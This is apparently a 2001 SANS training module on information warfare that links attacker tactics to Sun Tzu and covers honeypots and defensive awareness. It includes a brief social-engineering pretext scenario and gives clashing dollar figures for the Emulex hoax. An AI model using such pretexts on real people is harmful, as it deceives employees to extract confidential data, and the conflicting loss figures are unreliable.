5 - 1
Information Assurance Foundations - SANS
©2001
1
Information Warfare
Security Essentials
The SANS Institute
"Warfare" can be broadly defined as "the waging of armed conflict against an enemy." In this
module we will consider what warfare means in the context of today's information systems and
networks. We will see that the fundamental principles of warfare known for thousands of years are
still relevant on today's new battleground.
5 - 2
Information Warfare - SANS
©2001
2
Agenda
•What is Information Warfare?
• Why is it Important?
• Offensive Tactics
• Introduction to Network Attacks
• Defensive Tactics
After introducing the concept of information warfare, we will be concentrating on warfare principles
and strategies. We will discuss both offensive and defensive tactics, both theory and practice. As a
concrete example of offensive tactics, a quick introduction to TCP/IP network attacks is provided.
5 - 3
Information Warfare - SANS
©2001
3
What is Information Warfare?
Information warfare is the offensive and defensive
use of information and information systems to

deny, exploit, corrupt, or destroy, an adversary's
information, information-based processes,
information systems, and computer-based
networks while protecting one's own.
Such actions are designed to achieve advantages
over military or business adversaries.
Dr. Ivan Goldberg
We start our discussion with a definition of information warfare. The definition above simply maps
our intuitive definition of warfare (subvert the enemy while protecting ourselves) into the realm of
computers and networks. This definition has been provided by Dr. Ivan Goldberg, who leads the
"Institute for the Advanced Study of Information Warfare". The institute's website has a number of
white papers and reports on information warfare topics.
/>Eric Hrovat provides some interesting perspectives on information warfare in his paper, "Information
Warfare: The Unconventional Art in a Digital World" published by SANS:
/>5 - 4
Information Warfare - SANS
©2001
4
Examples of Information Warfare
• A company breaking into a competitor’s
computer system to find out their list of
customers
• An R&D company putting false
information about research on their web
site to mislead the competition
• A foreign government stealing tapes
containing classified information
There are many possible forms of information warfare, the above slide provides three examples. Any
time someone uses information as a weapon against an adversary, that is information warfare. The
distinguishing factors are only how the information is obtained, how it is used, and to what impact.

We consider theft of information a form of information warfare, but the most critical issue is how the
stolen information is used against its rightful owner. In terms of the examples, a company who
discovers a list of their competitor's customers might send false or misleading information to the
customers, might market to these people specifically, or might simply see to it that the customers are
harassed by telemarketers and spam (so the recipients think that the company they trusted released
their information without permission).
A foreign government stealing classified backup tapes might be able to discover detailed technical
information concerning the capabilities of their adversary's weapons, or might obtain documents
detailing strategies, names of informants, or maps of secret testing facilities. The possibilities are
endless.
A startup tech company that has a next generation product to release might post information stating
that their product will not be ready for several months. Such a posting might lull the company's
competitors into a false sense of not needing to hurry their own development cycles. When the
startup releases its product months earlier than advertised, the competition is caught flat-footed.
5 - 5
Information Warfare - SANS
©2001
5
Key Points From the Examples
• Information Warfare can be:
–Theft
– Deception
– Sabotage
• Does not have to be technical or
sophisticated
• Attackers will always go after the
weakest link
Abstracting the previous examples a level, we can list out a few fundamental concepts. Theft,
espionage, blackmail, deception, sabotage, destruction -- these are all common goals in information
warfare attacks. As in other forms of warfare, a skilled attacker will seek out his opponent's

weaknesses and attack those first and most vigorously. For example, sometimes social engineering or
packet flooding attacks most effectively accomplish an attacker's goals, but neither of these attacks
requires any sophisticated technical skills.
5 - 6
Information Warfare - SANS
©2001
6
Why is it Important?
• Affects all governments and companies,
and even individuals
• Can be devastating
• Risks are often not well understood
• Can be difficult to predict or detect
• Defenses must be custom tailored
• Raises questions of legalities and liabilities
In today's world, information warfare impacts everyone, whether they own a computer or not.
Consider identity theft, where one person is able to impersonate another, resulting in destroyed credit
histories, undeserved criminal records, misassigned debt and liability, false healthcare documents,
and more. Most people and organizations are not fully aware of the risks that surround them,
although the results of an attack can be devastating.
Because each organization is different, there is no "one size fits all" defense system. The only way to
design a good defense is to understand the offensive tactics used by attackers, and to understand the
defensive tactics and tools available to us. We will explore both offensive and defensive tactics in
this module, and see how (fortunately) a few basic principles can be applied across a large number of
situations. Interestingly, our most useful principles come not from information theory, but from a
compilation of warfare strategies written well over two thousand years ago: Sun Tzu's "Art of War".
These strategies are as relevant today as when they were first written.
5 - 7
Information Warfare - SANS
©2001

7
How Dangerous is it Really?
A few facts from the Honeynet project concerning
break-ins between April and December 2000:
• Seven default Red Hat 6.2 servers were attacked
within 3 days of connecting to net
• Fastest time for any server to be compromised was
15 minutes from first connection to net
• Default Win98 box compromised in less than 24
hours from first connection, and compromised
another four times in the next three days
But lets back up a minute. Perhaps we are over-reacting. Is it really all that dangerous on the internet
today? Are there really that many "evil-doers" out to do me ill when I connect to the internet?
Unfortunately, yes. The Honeynet project (a group that sets up and monitors whole networks of
honeypots of all different operating systems) recently reported some statistics concerning the rate of
break-ins to their small network over a period of 9 months. The full information concerning the stats
above is quoted from the paper below.
/>----------------
• Between April and December 2000, seven default installations of Red Hat 6.2 servers were
attacked within three days of connecting to the internet. Based on this, we estimate the life
expectancy of a default installation of Red Hat 6.2 server to be less than 72 hours. The last time we
attempted to confirm this, the system was compromised in less than eight hours. The fastest time ever
for a system to be compromised was 15 minutes. This means the system was scanned, probed, and
exploited within 15 minutes of connecting to the internet. Coincidentally, this was the first honeypot
we ever setup, in March of 1999.
• A default Windows 98 desktop was installed on October 31, 2000, with sharing enabled, the same
configuration found in many homes and organizations. The honeypot was compromised in less than
twenty four hours. In the following three days it was successfully compromised another four times.
This makes a total of five successful attacks in less than four days.
----------------

These facts (and other information in the paper) demostrate the hostility of today's networks even to
a simple home user. Even "grandma" needs to be aware of the dangers of the online environment
today. As an example, consider that many of us use home computers to fill out year-end income tax
forms. An attacker able to access that information would know enough to cause significant problems.
Today's networks are infested with worms and automated attack programs that relentlessly seek out
and compromise vulnerable computers, reporting back to a human only after accomplishing a
successful compromise. Companies and governments must be secured against these threats, as well
as against more sophisticated attackers specifically targeting their organization.
5 - 8
Information Warfare - SANS
©2001
8
How Would you be Impacted?
• Consider the following scenario:
– You go into work tomorrow and all of your
computers are gone and there is no internet
connection.
• Could you handle the situation?
• Do you have backups? Uncontaminated
backups? Is there a restore process?
• Could your organization survive the loss?
Is your organization prepared for an attack? Either from the internet or from a natural disaster or
terrorist act? Part of information warfare is planning for the worst and having a recovery plan in
place. Many of us would be in a lot of trouble if a particular building burned down for example --
that building being the one holding the primary information and all of its backup copies. The
September11th tragedy demonstrated how critical backups can be to a company's survival.
When we ask about "uncontaminated backups", does that make sense to you? Consider a virus that
spreads rapidly but remains undetected because it does not do anything observable. The virus infects
several computers, but because it is not detected the virus program is copied onto the backup tapes
along with legitimate information. Time passes. Ten months later the virus' payload goes into action

and starts destroying files and laying waste to operating systems. You think, no problem, I've got
backups going back 6 months. Oh no! All the backups are contaminated too! What do we do now?
Do you have insurance against information loss? A recent Information Week article (January 2,
2002) explains how many insurance providers have decided to exclude online assets and terrorism-
related damages from their IT policy offerings.
/>5 - 9
Information Warfare - SANS
©2001
9
Threats
• Internal threats
– Employees
– Contractors
–Visitors
• External threats
– Anyone connected to the internet
The threat to a company could really be anything. Threats are typically broken down into internal
and external threats. Internal threats are attacks launched by internal attackers, contractors, or even
visitors to your facility. External threats could really be anyone that is connected to the internet.
Threats can also range from intentional to unintentional events. Unintentional events, like floods or
fires, could also be a threat that impacts a company. Even though these threats are not meant to hurt
the company, the net result is the same. Therefore it is important to understand and react to all
possible threats that are posed to your company.
5 - 10
Information Warfare - SANS
©2001
10
Offensive Tactics
• Using publicly available information maliciously
• Stealing confidential information

• Destroying or corrupting important data
• Denial of Service attacks against business or
livelihood
• Providing false information in order to deceive,
mislead, or confuse
• Impersonation and slandering
• Public embarrassment (e.g. website defacement)
Let us begin our consideration of information warfare concepts by looking at the offensive side of
the game. Defensive strategies will be covered later.
The slide above lists several common ways information can be involved in an attack against an
organization or individual. At first glance it may seem that these attack methods are specific to the
information age. In the next few slides we will take a closer look at several of the specific tactics and
show that the concepts behind them have been well-known to warriors for centuries.
5 - 11
Information Warfare - SANS
©2001
11
Public but Sensitive Information
"It is always necessary to begin by finding out the names of
the attendants, the aides-de-camp, and door keepers and
sentries of the general in command."
-
Sun Tzu
• There are many sources of information
– Press releases
–Employment ads
– Company descriptions
– Public databases (whois, legal, edgar, healthcare,
whitepages)
Over two thousand years ago Sun Tzu noted that deploying spies to gather information such as the

names of people in the enemy organization, and the types of sentries (read defense mechanisms here)
is an important first step in warfare. Things haven't changed very much.
Given today's internet, it is possible for an attacker to find out a great deal about an adversary
without breaking any laws or even raising any eyebrows. If an attacker is interested in an individual
or a company, internet white page directories can provide names, addresses, phone numbers, street
maps, and even satellite photographs. Attackers can often gain access to legal, healthcare, and credit
history databases without too much trouble. A google.com search for an individual's email address
can provide links to newsgroup postings which contain information about the individual's interests,
habits, friends, employer, etc. Information-rich messages posted to security mailing lists such as "I
work for company XYZ and our main www.xyz.com IIS 5.0 web server has been hacked and is
backdoored..." can be very useful.
In addition, companies love giving out information to help fuel growth, but often fail to realize the
negative impact that information could have to the company. For example, an ISP who just built a
new network wants to advertise it to help get additional business. So they have a press release that
describes their new computers -- what brand, what operating systems, what versions, etc. An attacker
can easily use the information to build an attack list for breaking into the ISP's systems. Similarly, a
company that posts a list of employee names provides an attacker with information useful in
username/password guessing attacks.
Public databases can also provide a wealth of information. For example, publicly traded companies
are required to disclose certain information to the SEC. The SEC information is posted online in the
EDGAR database. These documents could be used to obtain the names of key executives, which
could be used in social engineering attacks.
Another common practice is for attackers to notice that a merger or acquisition has taken place, and
capitalize on the ensuing organizational confusion. For example, lets say our attacker's desired target
XYZ has recently acquired Acme Widgets Inc., and the two company's technologies are being
integrated. Our attacker simply phones up an XYZ engineer (name obtained via the company
directory) and says that he is from Acme Widgets and that Executive So-And-So (name obtained
from EDGAR) wanted him to call to get the latest product specifications and development timelines.
5 - 12
Information Warfare - SANS

©2001
12
Stealing Confidential Information
"Though the enemy be stronger in numbers, we may prevent
him from fighting. Scheme so as to discover his plans and
the likelihood of their success." -Sun Tzu
• Espionage is a real problem
• Many foreign governments have admitted to
launching corporate espionage attacks
against US companies to give their local
companies a competitive advantage.
A critical part of warfare, information or otherwise, lies in discovering the enemy's plans. Sun Tzu
notes that even a strong adversary can be crushed if his plans are known in advance. Online
espionage is the modern embodiment of this tactic, and it works as well today as ever.
One legal method of performing corporate intelligence gathering is to get the employees talking. A
recent news article describes how today's corporate spies rely heavily on forming online friendships
with target employees to gain information. According to one corporate intelligence professional, 85
percent of people will share sensitive information about themselves and their companies with perfect
strangers. The statistic is calculated based on the results of 78,000 recorded conversations with
people worldwide.
Further, companies have been known to hire agents to sit next to traveling executives on planes,
where they can read business information over the executive's shoulder, or engage in seemingly
innocent chit-chat. Experience has shown that executives are particularly vulnerable to questions
from brainless admirers.

And of course the true hack-in-and-steal-something method is wildly popular. For example, the
articles linked below describe an incident where attackers stole source code from Microsoft in
October of 2000. A Microsoft spokesperson called the incident "a deplorable act of industrial
espionage".
/> />Interestingly, two of the main concerns in the Microsoft incident were that the attackers would

implant backdoors in the Windows source code (they had access to the data for three months), and
that the attackers would analyze the source code and discover vulnerabilities that no one else knows
about. Other concerns included the notion that a rival company might try to market the stolen
software as their own, or use the proprietary algorithmic and programming techniques to advance
their own products. These concerns illustrate a few of the dangers of proprietary information theft.
5 - 13
Information Warfare - SANS
©2001
13
False Information
"All warfare is based on deception...The one who is skillful
maintains deceitful appearances, according to which the
enemy will act." -Sun Tzu
• If you know someone is watching you, why
not give them misleading information?
– False press releases
– False company information
– False server banners
This warfare tactic has the goal of misleading the enemy. The hope is that the enemy will use the
false information to influence their actions to our advantage. For example, a company might "leak"
the fact that they are going to submit a proposal for a particular job at the price of $5 million. The
competition, upon hearing this information, decides to bid $4.5 million. When the original company
actually bids $4 million (instead of the "leaked" $5 million figure) the spying competitor finds
themselves underbid.
As another example of misinformation in the information age, consider the case of an attacker who
fabricated a false press release that led to a publicly traded company temporarily losing more than $2
million in market value. The bogus press release was submitted via email to InternetWire and picked
up and distributed by a number of major news organizations. The press release stated that the
company in question (Emulex) was under investigation by the SEC, had revised its latest earnings
reports to show a loss instead of a profit, and was losing its CEO. The result was that investors

started to dump the company's stock en masse, sending Emulex's stock plummeting as much as 62%.
The company lost as much as $2.5 billion in market value before the fraud was discovered and
Nasdaq halted its trading.
/> />In general, the misinformation strategy is quite interesting and complex. The complexities arise the
same as in any other lie, how to lie to some people, while telling the truth to others and keep it all
straight? An organization employing these methods can easily lose control, or become liable for
damages resulting from the false statements. The techniques can be quite effective however.
5 - 14
Information Warfare - SANS
©2001
14
Honeypots
"Learn the principle of the enemy's activity or inactivity.
Force him to reveal himself ... By holding out advantages
to him, cause him to approach of his own accord."
-Sun Tzu
• Honeypots are sacrificial computers,
purposely left vulnerable.
• The computers are carefully instrumented
to record attackers' actions and gather
copies of the tools they use
Another example of deception in information warfare is the use of honeypots. The idea of a honeypot
is twofold.
First, as highlighted in the slide, honeypots can be used to gather intelligence about an attacker's
methods and goals. By leaving a few machines purposely vulnerable but instrumented, we can allow
attackers to break in and then watch what they do. By observing what files they look for we may be
able to guess what they are after, and by watching the tools they use we gain an idea of their
capabilities and methods of operation. For example, if the attacker exploits a MS SQL server
vulnerability to gain access, we would want to be sure to patch that vulnerability on all relevant
systems across the enterprise. Further, if we notice that the attacker likes to set up a Trojan SSH

server on port 50000/tcp, we might want to scan the internal networks for port 50000 listeners.
Second, honeypots can provide a way of diverting an attacker’s attention away from critical systems
for long enough to strengthen the defense. An attacker is likely to go after the "low hanging fruit",
that is, the easily compromised hosts on an enterprise, before moving on to more difficult targets. By
letting the attacker have a few sacrificial machines, we buy some time to learn about the attacker's
capabilities and react appropriately. Of course, Sun Tzu has a quote for this aspect of the strategy
too: "Sacrifice something, that the enemy may snatch at it."
5 - 15
Information Warfare - SANS
©2001
15
Denial of Service Attacks
"So in war, the way is to avoid what is strong and
strike at what is weak." -Sun Tzu
•Easy to wage
• Difficult to defend against
• Can result in lost revenue
• Can hurt public image
Most of us remember the infamous Distributed Denial of Service (DDoS) attacks waged by a
Canadian teenager in February of 2000 resulting in an estimated total loss of $1.7 billion to several
US companies. The attacker, known as "mafiaboy," flooded the webservers of Ebay, Dell, Amazon,
and Yahoo (among others) with meaningless traffic in order to overload the target networks and
prevent the servers from responding to legitimate requests. Because each of the targeted
organizations relies heavily on its internet presence as a source of revenue, Mafiaboy's Denial of
Service attack was quite damaging.
A news article on the topic:
/>The important thing to take away from the example is that Mafiaboy didn't need any sophisticated
technical skills to wage these attacks. In fact, the tools he used and others like them are publicly
available on many websites. These tools do not take any special skills to run.
On the other hand the sites that were attacked all employ heavy security and would be difficult to

break into. Mafiaboy employed Sun Tzu's concept of avoiding what is strong (the site's security
defenses) and striking at what is weak (fundamental behavior of IP networks). Most Denial of
Service attacks are simple to wage, but difficult to defend against. Why not take the easy route to
inflicting damage on an enemy? Part of defensive information warfare comes in identifying our own
weaknesses and strengthening our defenses accordingly.
5 - 16
Information Warfare - SANS
©2001
16
Understand the Risks
"He who exercises no forethought but makes light of his
opponent is sure to be captured by them." -Sun Tzu
• Attackers have a complete arsenal of
weapons to use against a network's
defenses
• An understanding of an attacker's offensive
warfare tactics is essential
The point of intersection between offense and defense comes in understanding the offensive in order
to better defend. In information warfare, this concept is very important. It has been estimated that
new vulnerabilities were being discovered at the rate of 200 per month by mid 2001.
/>A recent CERT report provides the following figures concerning numbers of reported vulnerabilities
for the past three years:
1999: 417 vulnerabilities
2000: 1090 vulnerabilities
2001: 2437 vulnerabilities
CERT further reports that the number of incidents has doubled between 2000 and 2001. 21,756
incidents were reported in 2000, while 52,658 incidents were reported in 2001. Less than 10,000
incidents were reported in 1999.
/> />Clearly it is important to keep up with information on new vulnerabilities, patches, and exploits. It is
also important to understand the fundamental techniques employed by attackers (e.g. buffer

overflows, improperly formatted packets, weak password exploitation, etc.) so that we can spot
vulnerabilities ourselves before an attacker finds them. The administrator who believes that "it
couldn't happen to them" is sure to be in for a rough ride.